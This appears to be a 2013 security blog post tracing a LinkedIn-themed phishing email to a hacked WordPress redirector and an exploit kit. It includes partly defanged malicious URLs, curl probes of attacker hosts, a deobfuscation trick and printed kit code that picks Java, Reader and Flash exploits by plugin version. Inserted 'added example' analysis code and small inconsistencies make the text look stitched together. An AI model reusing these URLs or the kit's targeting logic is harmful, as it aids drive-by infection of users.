Spam in combination with phishing and exploiting

Yesterday a reader of ours forwarded two phishing emails. The first email was a PayPal phishing email, but the links in it were already offline, so we concentrated on the second one. This second email looked like it was from LinkedIn.

The LinkedIn spam mail

We decided to analyze the link in the spam mail.

Attention: Please only open this URL if you know what you’re doing. Tip: “REMOVE” ;)

http://bobdykstra.com/wp-content/_REMOVE_themes/toolbox/wp-secure.php?c002

It seems like someone hacked a WordPress installation and abused it to send out phishing emails. The script “wp-secure.php” contained some logic that chose the redirection destination: either microsoft.com or the exploit kit.

The script checked the “User-Agent” header of the HTTP request. If you sent no User-Agent, or the wrong one, you were redirected to microsoft.com:

% curl -D - http://bobdykstra.com/wp-content/themes/_REMOVE_toolbox/wp-secure.php
HTTP/1.1 302 Found
Date: Tue, 12 Mar 2013 19:02:27 GMT
Server: Apache
Location: http://microsoft.com
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html

If you used a Firefox User-Agent with “windows” in it, you were redirected to the exploit kit:

% curl -D - -A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" http://bobdykstra.com/wp-content/themes/_REMOVE_toolbox/wp-secure.php
HTTP/1.1 302 Found
Date: Tue, 12 Mar 2013 19:05:39 GMT
Server: Apache
Location: http://1oihfoishfos.qHigh.com/closest/_REMOVE_209tuj2dsljdglsgjwrigslgkjskga.php
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
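The User-Agent dependent redirect seen above is easy to miss when you only test a page with one client. The following is an added example (not code from the original post or from the compromised site): it requests one URL with several User-Agent strings and reports whether the redirect target changes. The `fetchHead(url, ua)` function is injectable, so the logic runs offline against a constructed stand-in; with Node 18+ it could wrap global `fetch` using `redirect: "manual"` (assumption: that returns the 302 and its Location header instead of following it).

```javascript
// Added example, not from the original post: probe one URL with several
// User-Agent strings and report whether the redirect target depends on the UA,
// which is the cloaking behaviour observed in wp-secure.php above.
const PROBE_AGENTS = {
  none: "",                                   // no custom UA
  curl: "curl/7.29.0",
  ie6win: "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)",
  firefoxLinux: "Mozilla/5.0 (X11; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0",
};

// fetchHead(url, ua) must resolve to { status, location } without following redirects.
async function probeCloaking(url, fetchHead, agents = PROBE_AGENTS) {
  const results = {};
  for (const [name, ua] of Object.entries(agents)) {
    const r = await fetchHead(url, ua);
    const redirected = r.status >= 300 && r.status < 400 && r.location;
    results[name] = redirected ? r.location : null;
  }
  // More than one distinct redirect host means the page serves different
  // visitors differently, i.e. it is cloaking.
  const hosts = new Set(
    Object.values(results).map((l) => (l ? new URL(l).host : "(no redirect)"))
  );
  return { cloaked: hosts.size > 1, results };
}

// Constructed stand-in for the observed server logic (not the real script):
// a UA containing "Windows" is sent on to a placeholder second-stage host,
// everything else to microsoft.com.
async function fakeWpSecure(url, ua) {
  const location = /windows/i.test(ua)
    ? "http://second-stage.invalid/closest/landing.php"
    : "http://microsoft.com";
  return { status: 302, location };
}
```

For a real check, pass a `fetchHead` that issues the request and returns the status and Location header; probing with a handful of agents is usually enough to expose this kind of gate.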

Ok, there’s another fancy-looking URL. Let’s have a look at it (the User-Agent did not matter anymore):

-> % curl -D - -s http://1oihjsfoihoifh.ftpserver.biz/closest/_REMOVE_209tuj2dsljdglsgjwrigslgkjskga.php -o /dev/null
HTTP/1.1 200 OK
Server: nginx/1.2.7
Date: Tue, 12 Mar 2013 19:04:58 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Vary: Accept-Encoding

The response contained about 150 kB of page content. It turned out to be some HTML code and a lot of JavaScript code.

You can find the full HTTP-Response here: http://uploads.internetwache.org/weiterleitung.txt

The source code

Obfuscated code is quite hard to read, so the next step was to deobfuscate it. That was really easy: just apply the following replacement, so that the decoded script is printed instead of evaluated:

z("zxczxc=1;"+s); => console.log(s);

You can find the result here: http://uploads.internetwache.org/weiterleitung.html

After running it through JSBeautifier.org the code was even more readable:

http://nopaste.me/paste/1716874074513f7fc517551

The code checks the version numbers of plugins like Adobe Reader, Java and Flash:

function svwrbew6436b($) {
    var ar = [];    // payload functions to run, in order
    // Java: split the detected version into parts ("1.7.0.x." -> ["1","7","0","x",""])
    var javax = ($.getVersion("Ja" + "va") + ".").toString()["split"](".");
    if ($.isMinVersion("Ja" + "va") >= 0 && ((javax[0] == 1 && javax[1] == 7 && javax[3] < 9))) {
        ar["push"](j2);    // Java 1.7 below update 9
    } else if ($.isMinVersion("Ja" + "va") >= 0 && ((javax[0] == 1 && javax[1] == 6 && javax[3] < 33) || (javax[0] == 1 &&javax[1] < 6))) {
        ar["push"](j1);    // Java 1.6 below update 33, or older than 1.6
    }
    // Adobe Reader: a non-string result means "not installed"
    pdfver = pdpd.getVersion("AdobeReader");
    if (window.document) if (typeof pdfver == "string") {
        pdfver = pdfver["split"](".")
    } else {
        pdfver = [0, 0, 0, 0]
    }
    if (pdfver[0] > 0 && pdfver[0] < 8) {
        if (window.document) ar["push"](p1);    // Reader 1 to 7
    }
    if (((pdfver[0] == 9) && (pdfver[1] >= 3)) || ((pdfver[0] == 10) && (pdfver[1] < 103))) {
        ar["push"](p3);    // Reader 9.3+ or 10.x
    } else {
        if (window.document && (pdfver[0] == 8 || (pdfver[0] == 9 && pdfver[1] < 4))) {
            ar["push"](p2);    // Reader 8.x or 9.0 to 9.2
        }
    }
    // Flash: window.document is always truthy in a browser and only pads the conditions
    var ver = ($$.getVersion("Flash") + ".").toString()["split"](".");
    if (((ver[0] == 10 && ver[1] == 0 && ver[2] > 40) || (window.document && (ver[0] == 10 && ver[1] > 0) && (ver[0] == 10&& ver[1] < 2))) || window.document && ((ver[0] == 10 && ver[1] == 2 && ver[2] < 159) || (ver[0] == 10 && ver[1] < 2))) {
        ar["push"](ff2);    // Flash 10.0 to 10.2.158
    }
    if ((ver[0] == 10 && ver[1] == 3 && ver[2] == 181 && ver[3] <= 23) || (ver[0] == 10 && ver[1] == 3 && ver[2] < 181)) {
        ar["push"](f1);    // Flash 10.3.181.23 and below
    }
    // Run the selected payloads one after another; after one that reports
    // success, wait 5509 ms before trying the next
    var arcalli = 0;
    var arcall = function () {
        if (ar.length <= arcalli) return 123;
        ss = setTimeout;
        var res = ar[arcalli]();
        arcalli++;
        if (res && window.document) {
            ss(function () {
                arcall()
            }, 5509);
        } else {
            arcall();
        }
    };
    arcall();
}
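To see which versions this landing page actually goes after, it helps to rewrite the gating without the obfuscation noise. The following is an added example (not code from the post or from the kit): a readable re-implementation of the version checks above that, given the plugin versions a browser would report, returns the payload slots the page would queue, in order. It assumes dotted version strings, as the `split(".")` calls in the original imply, and mirrors the original’s loose comparisons (an empty part compares as 0, a missing part never matches).

```javascript
// Added example, not the kit's code: re-implementation of the version gating.
function parts(s) {
  // "" compares as 0 in the original's loose comparisons; a missing part is NaN
  return s.split(".").map((x) => (x === "" ? 0 : Number(x)));
}

// Returns the payload slot names the landing page would try, in order.
function selectPayloads({ java, adobeReader, flash }) {
  const ar = [];

  // Java: 1.7 below update 9 -> j2; 1.6 below update 33, or anything older -> j1
  if (java) {
    const j = parts(java + ".");
    if (j[0] === 1 && j[1] === 7 && j[3] < 9) ar.push("j2");
    else if ((j[0] === 1 && j[1] === 6 && j[3] < 33) || (j[0] === 1 && j[1] < 6)) ar.push("j1");
  }

  // Adobe Reader: a non-string version counts as "not installed" (0.0.0.0)
  const p = typeof adobeReader === "string" ? parts(adobeReader) : [0, 0, 0, 0];
  if (p[0] > 0 && p[0] < 8) ar.push("p1");                                      // Reader 1 to 7
  if ((p[0] === 9 && p[1] >= 3) || (p[0] === 10 && p[1] < 103)) ar.push("p3"); // 9.3+ or 10.x
  else if (p[0] === 8 || (p[0] === 9 && p[1] < 4)) ar.push("p2");              // 8.x or 9.0 to 9.2

  // Flash: the original's overlapping 10.x terms collapse to these two ranges
  if (flash) {
    const f = parts(flash + ".");
    if (f[0] === 10 && (f[1] < 2 || (f[1] === 2 && f[2] < 159))) ar.push("ff2");               // 10.0 to 10.2.158
    if (f[0] === 10 && f[1] === 3 && (f[2] < 181 || (f[2] === 181 && f[3] <= 23))) ar.push("f1"); // up to 10.3.181.23
  }
  return ar;
}
```

Feeding in the versions from a fleet inventory shows at a glance which machines this page would have fired on and which plugins needed updating.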

Feel free to further analyze this exploit code. All we know is that, based on the different version numbers, some specific functions will be executed (exploits?). We sent an abuse email to the DynDNS provider “ftpserver.biz”. Maybe this will help somehow ;)

Conclusion

Like always: never open strange links in emails from untrusted senders!

Otherwise you’re likely to be owned by some bad guys :( Tip: disable as many browser plugins as possible and/or keep them up to date. Additionally, there are some useful extensions (e.g. NoScript) available for the most common browsers.

The team of internetwache.org